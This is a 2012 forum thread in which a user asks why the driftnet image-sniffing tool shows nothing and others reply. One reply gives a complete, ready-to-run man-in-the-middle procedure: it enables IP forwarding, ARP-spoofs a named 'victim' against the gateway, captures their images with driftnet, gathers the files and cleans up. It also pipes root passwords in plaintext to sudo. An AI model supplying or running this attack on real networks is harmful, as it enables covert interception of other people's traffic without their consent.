problem with drifnet

berghem · July 24, 2012, 07:59:10 AM

hi all
i tried use drifnet tool, but I have some problems...
i wrote this command in shell
sudo drifnet -i wlan0
after I open firefox and i loaded some pages with picture, but drifnet windows was empty

Can you help me?

utqual · July 24, 2012, 12:02:25 PM

Are you trying to sniff the traffic of your computer or other host? If you want to sniff packets from another host connected to your network you must first start an arp spoofing session with ettercap or arpspoof

berghem · July 24, 2012, 02:26:21 PM

I only tried with my host. I haven't other host in this moment....

utqual · July 24, 2012, 03:33:27 PM

it's strange, it works for me... I don't know, wait for the replies of the other users

ostendali · July 24, 2012, 05:09:36 PM

we have noticed nothing unusual on this app, so there might be some of your custom setting over your system.
will suggest to reinstall your app and remove anything related in your home dir.

r083rt · July 24, 2012, 05:47:10 PM

Sill question are you using arpspoof ??

please post your full method as sudo driftnet -i wlan0 will just not cut the mustard you have left out steps of this procedure

1 ) sudo { remove from commands below if your using root }
2 ) echo "password" | sudo -S { remove from commands below if your using root }

Code Select


sudo mkdir /tmp/driftnet
sudo mkdir $HOME/driftnet
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t target gateway
sudo driftnet  -a -i wlan0 -d /tmp/driftnet

replace target with the victims ipand gateway with your gateway

to get your gateway type

Code Select


ip route show default | awk '/default/ {print $3 }'

Code Select


echo "password" | sudo -S find /tmp/driftnet -type f -name "*.*" -exec mv {} $HOME/driftnet \;

replace password with the password you have setup for root

then close driftnet , disbale ipfoward and stop arpspoof

Code Select


sudo pkill driftnet
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo pkill arpspoof

and the pictures will be in a driftnet folder in your user folder

if you want to remove some junk files like gifs and pngs depending on the items you want to keep then do

Code Select


echo "password" | sudo -S find $HOME/driftnet -type f -name "*.gif*" -exec rm {}  \;
echo "password" | sudo -S find $HOME/driftnet -type f -name "*.png*" -exec rm {}  \;

replace password with the password you have setup for root

r083rt

weVeg · July 24, 2012, 06:00:19 PM

Hi berghem, if can be useful for you, when i use driftnet i put -a option that save images in tmp/ folder otherwise i see only a blck screen, then i open images with xdg-open, so the command result something like:

Code Select

driftnet -a -v -i wlan0
you can try it with some vm...

problem with drifnet

berghem

utqual

berghem

utqual

ostendali

r083rt

weVeg